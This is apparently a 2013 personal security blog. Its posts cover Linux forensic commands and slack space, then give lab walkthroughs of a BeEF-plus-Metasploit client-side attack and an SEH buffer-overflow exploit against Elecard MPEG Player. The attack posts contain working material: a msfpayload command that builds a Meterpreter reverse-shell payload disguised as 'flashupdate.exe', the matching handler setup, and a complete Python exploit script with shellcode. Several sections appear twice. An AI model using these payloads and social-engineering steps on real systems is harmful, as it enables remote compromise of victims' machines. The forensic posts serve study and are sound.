codename scx030c06c
Friday, 24 May 2013
Linux commands for computer forensics
Here are some of linux basic command that used in computer forensics :
1. dd - command used to copy from an input file or device to an output file or device.
syntax : dd if=[source] of=[destination] bs=(optional)
2. hdparm - command to get evidence harddisk information.
syntax : hdparm [ flags ] [device]
3. sfdisk and fdisk - command to determine the disk structure.
syntax :
sfdisk [options] device
sfdisk -s [partition]
4. md5sum and sha1sum - create and store an MD5 or SHA hash of file or list of files (including devices). syntax :
md5sum [OPTION] [FILE]...
md5sum [OPTION] --check [FILE]
sha1sum [OPTION] [FILE]...
sha1sum [OPTION] --check [FILE]
5. mount - mount a file system.
syntax :
mount [-lhV]
mount -a [-fFnrsvw] [-t vfstype] [-O optlist]
mount [-fnrsvw] [-o options [,...]] device | dir
mount [-fnrsvw] [-t vfstype] [-o options] device dir
6. etc..
1. dd - command used to copy from an input file or device to an output file or device.
syntax : dd if=[source] of=[destination] bs=(optional)
2. hdparm - command to get evidence harddisk information.
syntax : hdparm [ flags ] [device]
3. sfdisk and fdisk - command to determine the disk structure.
syntax :
sfdisk [options] device
sfdisk -s [partition]
4. md5sum and sha1sum - create and store an MD5 or SHA hash of file or list of files (including devices). syntax :
md5sum [OPTION] [FILE]...
md5sum [OPTION] --check [FILE]
sha1sum [OPTION] [FILE]...
sha1sum [OPTION] --check [FILE]
5. mount - mount a file system.
syntax :
mount [-lhV]
mount -a [-fFnrsvw] [-t vfstype] [-O optlist]
mount [-fnrsvw] [-o options [,...]] device | dir
mount [-fnrsvw] [-t vfstype] [-o options] device dir
6. etc..
Thursday, 23 May 2013
Computer Forensic : unallocated space and slack space
Unalocated
space : Unallocated space, sometimes called “free space”, is logical space on a
hard drive that the operating system, e.g Windows, can write to. To put it
another way it is the opposite of “allocated” space, which is where the
operating system has already written files to. Unallocated space can contain deleted
files or partially deleted files. When a
file is deleted, the pointers to the file are removed, but the data remains in
unallocated space until such time as the operating system stores another file
in the same space, thereby over-writing the data.
Slack
space : Slack space refers to portions of a hard drive that are not fully used
by the current allocated file and which may contain data from a previously
deleted file. Slack space or sometimes referred to as file slack is the area
between the end of a fileand end of the last cluster or sector used by the file
in question. Slackspace is common in file systems that use a large cluster
size, while the file system that uses a small cluster size can organize the
storage media more effectively and efficiently. A cluster is the smallest unit
of storage that the operating system can deal with. When a file is written, and
does not occupy the entire cluster, the remaining space is slack space.
Computer Forensic : Introduction
Hello again, today my blog post is about Computer Forensic, one of my favourite subject in computer security world. What is Computer Forensic? Computer forensics is the application of
investigation and analysis techniques to gather and preserve evidence from a
particular computing device in a way that is suitable for presentation in a
court of law. The goal of computer forensics is to perform a structured
investigation while maintaining a documented chain of evidence to find out
exactly what happened on a computing device and who was responsible for it.
Computer forensics involves the preservation, identification, extraction,
interpretation, and documentation of computer evidence.
So, what is the differences between Computer Forensic and Digital Forensic? Digital forensics (sometimes known as digital forensic science) is a branch of forensic science encompassing the recovery and investigation of material found in digital devices, often in relation to computer crime. The term digital forensics was originally used as a synonym for computer forensics but has expanded to cover investigation of all devices capable of storing digital data.
There are 4 phases of Digital Forensic :
1. Identification (Crime scene) --> identify all of the digital evidences
2. Collecting (Lab)
a. Chain of custody --> collecting, labeling and documenting all of the digital evidences
b. Acquisition --> make clones of digital evidences
c. Fingerprint --> create hash file
3. Analysis (Lab)
a. Chain of Custody --> change permisssion of digital evidence to read-only
b. Analysis --> perform analysis from the clone of digital evidences
c. Collecting --> summarize the results found
d. Reconstruction --> construct the case into timeframe
4. Presentation (Court / Law)
There are 2 conditions when performing forensic activity :
1. Live : when the digital evidences still alive/turn on. In this case the investigator can also clone the RAM
2. Dead : when the digital evidences have been torned off.
So, what is the differences between Computer Forensic and Digital Forensic? Digital forensics (sometimes known as digital forensic science) is a branch of forensic science encompassing the recovery and investigation of material found in digital devices, often in relation to computer crime. The term digital forensics was originally used as a synonym for computer forensics but has expanded to cover investigation of all devices capable of storing digital data.
There are 4 phases of Digital Forensic :
1. Identification (Crime scene) --> identify all of the digital evidences
2. Collecting (Lab)
a. Chain of custody --> collecting, labeling and documenting all of the digital evidences
b. Acquisition --> make clones of digital evidences
c. Fingerprint --> create hash file
3. Analysis (Lab)
a. Chain of Custody --> change permisssion of digital evidence to read-only
b. Analysis --> perform analysis from the clone of digital evidences
c. Collecting --> summarize the results found
d. Reconstruction --> construct the case into timeframe
4. Presentation (Court / Law)
There are 2 conditions when performing forensic activity :
1. Live : when the digital evidences still alive/turn on. In this case the investigator can also clone the RAM
2. Dead : when the digital evidences have been torned off.
Monday, 20 May 2013
From web application to ID 0
How to gaining access to local system from web application? in this post i will simulate the process of gaining access using DVWA installed on Metasploitable OS as a target. i will use the one of several vulnerabilities of DVWA to penetrate the system, put the backdoor shell command, gaining root access, and doing some post exploitation activities.
--on progress--
--on progress--
Sunday, 19 May 2013
Client side attack combination using BeEF and Metasploit
Hello again, in this post i will simulate the client side attack using Beef and metasploit. client side attack is the attack performed by the client. in this simulation i am using windows xp in virtualbox and firefox browser as a target.
Here's the gameplay :
1. attacker send the link of youtube website to the target that contain file hook.js from BeEF
2. when the target open the link, BeEf will hook the target.
3. attacker will send the fake javascript update .exe that contain payload from metasploit
3. target click the update and the system will be pwned.
And here's the steps :
- choose a video on youtube and save page as youtube.html and put in /var/www/
- run the BeEF from menu backtrack > exploitation > social engineering tools > BeEF
- modify the youtube.html and insert the hook.js
- run the infected html file in target's browser
- open BeEF panel in backtrack's browser, the address is 192.168.56.1:3000/ui/panel
- the target's browser is successfully hooked by BeEF
- create the fake exe file update using metasploit
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=1234 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /var/www/flashupdate.exe
- run metasploit (msfconsole) and listening on port 1234
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.56.1
set LPORT 1234
exploit
- send the payload file with redirect browser command in BeEF
- execute the file
- Voila! the system is pwned!
Wednesday, 24 April 2013
Buffer Overflow : SEH based exploit on Elecard MPEG Player
in this post i will write my steps to exploit media player application (Elecard MPEG Player) with SEH protection, and here's the steps :
1. install application in windows XP machine
2. do the information gathering about supported filetype
3. From IG i got the information : the target support .m3u file and need a header
4. create the fuzzer file with python
file="seh.m3u"
junk="#EXTM3U\n"
junk+="\x41"*15000
file=open(file,"w")
file.write(junk)
print "file created successfully..."
file.close()
5. compile fuzzer to generate the m3u file
6. run target and load the m3u fuzzer
7. the target is crashed
8. now open the target with ollyDbg to to see what actually happened
9. run target and load the m3u fuzzer
10. the target is crashed. look at the top left box, the EBP and ESI is overwritten, but the EIP is not. it's because the SEH handle the crash
11. to see the SEH go to view > SEH chain. press shift+F9 to bypass the fuzzer to EIP
12. next step is create pattern with metasploit and insert into fuzzer script
13. run target from ollyDbg and load the m3u fuzzer
14. look the address in SEH chain and find the offset using metasploit
15. the offset is 8, that means need 8 byte to go to SEH
16. change the fuzzer script to measure the exact address of SEH
file="music.m3u"
junk="#EXTM3U\n"
junk+="\x90"*8
junk+="\xEF\xBE\xAD\xDE"
junk+="\x90"*(15000-len(junk))
file=open(file,"w")
file.write(junk)
print "file created successfully..."
file.close()
17. okay, the SEH address is pwned.
18. next step is find the module that has POP POP RETN command but doesn't have SafeSEH protection
19. i will try to use esrcnet.dll module
20. now search sequence command of POP POP RETN in D3DIM7300 module
21. modify the fuzzer script
file="music.m3u"
junk="#EXTM3U\n"
junk+="\x90"*4
junk+="\xeb\x06\x90\x90" #jump short
junk+="\xA6\xA0\x94\x73" #POP ESI address
junk+="\x90"*(15000-len(junk))
file=open(file,"w")
file.write(junk)
print "file created successfully..."
file.close()
21. generate the payload with msfweb, in this case i use command call calculator
22. insert the payload into the fuzzer script and compile it
file="music.m3u"
junk="#EXTM3U\n"
junk+="\x90"*4
junk+="\xeb\x06\x90\x90" #jump short
junk+="\xA6\xA0\x94\x73"
junk+="\x90"*16
junk+=("\xbb\x10\xbf\xd7\x63\x29\xc9\xda\xc4\xd9\x74\x24\xf4\x5a\xb1\x23"
"\x31\x5a\x10\x83\xc2\x04\x03\x4a\xb3\x35\x96\x96\x23\xfd\x59\x66"
"\xb4\x75\x1c\x5a\x3f\xf5\x9a\xda\x3e\xe9\x2e\x55\x59\x7e\x6f\x49"
"\x58\x6b\xd9\x02\x6e\xe0\xdb\xfa\xbe\x36\x42\xae\x45\x76\x01\xa9"
"\x84\xbd\xe7\xb4\xc4\xa9\x0c\x8d\x9c\x09\xe9\x84\xf9\xd9\xae\x42"
"\x03\x35\x36\x01\x0f\x82\x3c\x4a\x0c\x15\xa8\xff\x30\x9e\x2f\x14"
"\xc1\xfc\x0b\xee\x11\xcd\x93\x8a\x1e\x6e\x24\xd7\xe1\x17\x48\x5c"
"\xa1\xeb\xdb\x12\x3e\x59\x50\xba\x36\x4a\x6e\xb1\xc7\x3c\x71\xc5"
"\xc7\xb7\x1a\xf9\x98\xf6\x2c\x61\x71\x70\x28\xe2\xbd\xf9\x99\x8c"
"\x43\x26\xfb\x3f\xd4\x4e\x02\x35\x2a\x38\x04\xae\x50\xa7\x96\x53"
"\x97")
junk+="\x90"*(15000-len(junk))
file=open(file,"w")
file.write(junk)
print "file created successfully..."
file.close()
23. run the target without ollyDbg and insert the m3u fuzzer and see what happened
24. voila! the target is pwned!
Subscribe to:
Posts (Atom)